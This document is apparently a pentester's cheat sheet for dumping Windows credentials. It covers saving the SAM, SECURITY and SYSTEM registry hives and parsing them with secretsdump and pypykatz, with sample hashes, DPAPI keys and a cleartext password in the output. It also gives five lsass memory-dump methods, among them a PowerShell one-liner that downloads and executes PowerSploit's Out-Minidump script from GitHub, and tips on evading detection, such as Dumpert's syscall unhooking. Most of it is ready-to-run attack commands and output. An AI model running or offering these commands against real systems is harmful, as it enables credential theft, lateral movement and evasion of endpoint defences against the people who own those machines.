How to dump creds for offline analysis (lsass, sam, lsa secret, cached domain, …)

Registry Hives (SAM/LSA Secrets/Cached Domain)

Dump on the windows machine

reg.exe save hklm\sam %TEMP%/sam.save
reg.exe save hklm\security %TEMP%\security.save
reg.exe save hklm\system %TEMP%\system.save

With secretdumps

$ ./secretsdump.py -sam /tmp/dump/sam.save -security /tmp/dump/security.save -system /tmp/dump/system.save LOCAL
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x3e62535704cdbf03f05168d943856689
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
john.adm:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fc4ff20fd7d08f3f00edbca1bc29d7a0:::
user:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1020:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
limited:1021:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf12c15bfbe9cedca364296f5c758b7c8f3029261
dpapi_userkey:0x644ac66a4694f6bad0c5d9d7d745dbc7053ca4d5
[*] NL$KM 
 0000   5D C6 38 68 30 2D 33 67  AF FE C4 F1 02 D9 1A 95   ].8i0-3g........
 0010   54 A2 44 96 20 CA 7A A1  85 05 E5 D2 6B 40 56 C9   T.D. .z.....k@V.
 0020   F6 EC E6 ED 5F FC 77 48  4E 30 D9 A3 40 E7 01 E2   ...._.wHN0..@...
 0030   4C 51 C3 F3 2B 07 5E 0B  2C 8C CE 6A 70 0F 6E E8   LQ....^.,..jp.n.
NL$KM:5dc63869302d1367affec4f102d91a9554a2449620ca7aa18505e5d26b4056c1f6ece1ed3ffc77484e30d9a340e701e24c51c3f31b075e0b2c8cce6a700f6ee8
[*] _SC_PDQInventory 
(Unknown User):Password1
[*] Cleaning up...

With pypykatz

Note: pip3 install pypykatz (source)

$ pypykatz registry system.save --sam sam.save --security security.save

lsass.exe

1. Procdump

You can use the PID of the process to avoid some detection.

# DUMP
C:\Users\user\AppData\Local\Temp>tasklist | findstr /i lsas
lsass.exe                      636 Services                   0    40 748 Ko

# NAME
C:\Users\user\AppData\Local\Temp>procdump64.exe -accepteula -ma lsass.exe lsass.dmp

# PID
C:\Users\user\AppData\Local\Temp>procdump64.exe -accepteula -ma 636 636.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[14:29:50] Dump 1 initiated: C:\Users\user\AppData\Local\Temp\636.dmp
[14:29:51] Dump 1 writing: Estimated dump file size is 41 MB.
[14:29:51] Dump 1 complete: 41 MB written in 0.1 seconds
[14:29:51] Dump count reached.
# use with mimikatz
$ mimikatz.exe "sekurlsa::minidump c:\temp\lsass.dmp" "sekurlsa::logonpasswords"

# use with pypykatz
$ pypykatz lsa minidump lsass.dmp

2. comsvcs.dll

Note: You need administrative AND debug privileges to dump with comsvc.dll. Powershell has theses privs by default. (source)

# DUMP
C:\Users\user\AppData\Local\Temp>tasklist | findstr /i lsas
lsass.exe                      636 Services                   0    40 748 Ko

powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 636 %TEMP%\lsass.dmp full

3. Task manager

Open task manager as admin, right click lsass.exe (or Local Security Authority Process), create dump, done. ¯\(ツ)

4. Out-Minidump.ps1

Link : https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | out-minidump"

5. Dumpert

Link : https://github.com/outflanknl/Dumpert

# Output : C:\WINDOWS\Temp\dumpert.dmp
# exe
C:\WINDOWS\system32> C:\temp\Outflank-Dumpert.exe
 ________          __    _____.__                 __
 \_____  \  __ ___/  |__/ ____\  | _____    ____ |  | __
  /   |   \|  |  \   __\   __\|  | \__  \  /    \|  |/ /
 /    |    \  |  /|  |  |  |  |  |__/ __ \|   |  \    <
 \_______  /____/ |__|  |__|  |____(____  /___|  /__|_ \
         \/                             \/     \/     \/
                                  Dumpert
                               By Cneeliz @Outflank 2019

[1] Checking OS version details:
        [+] Operating System is Windows 10 or Server 2016, build number 18363
        [+] Mapping version specific System calls.
[2] Checking Process details:
        [+] Process ID of lsass.exe is: 928
        [+] NtReadVirtualMemory function pointer at: 0x00007FFDEADBEEF
        [+] NtReadVirtualMemory System call nr is: 0x3f
        [+] Unhooking NtReadVirtualMemory.
[3] Create memorydump file:
        [+] Open a process handle.
        [+] Dump lsass.exe memory to: \??\C:\WINDOWS\Temp\dumpert.dmp
        [+] Dump succesful.

# dll (silent, no output)
rundll32.exe  C:\Users\kaluche\Desktop\Dumpert-master\Dumpert-master\Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll, Dump

NTDS.dit

Todo …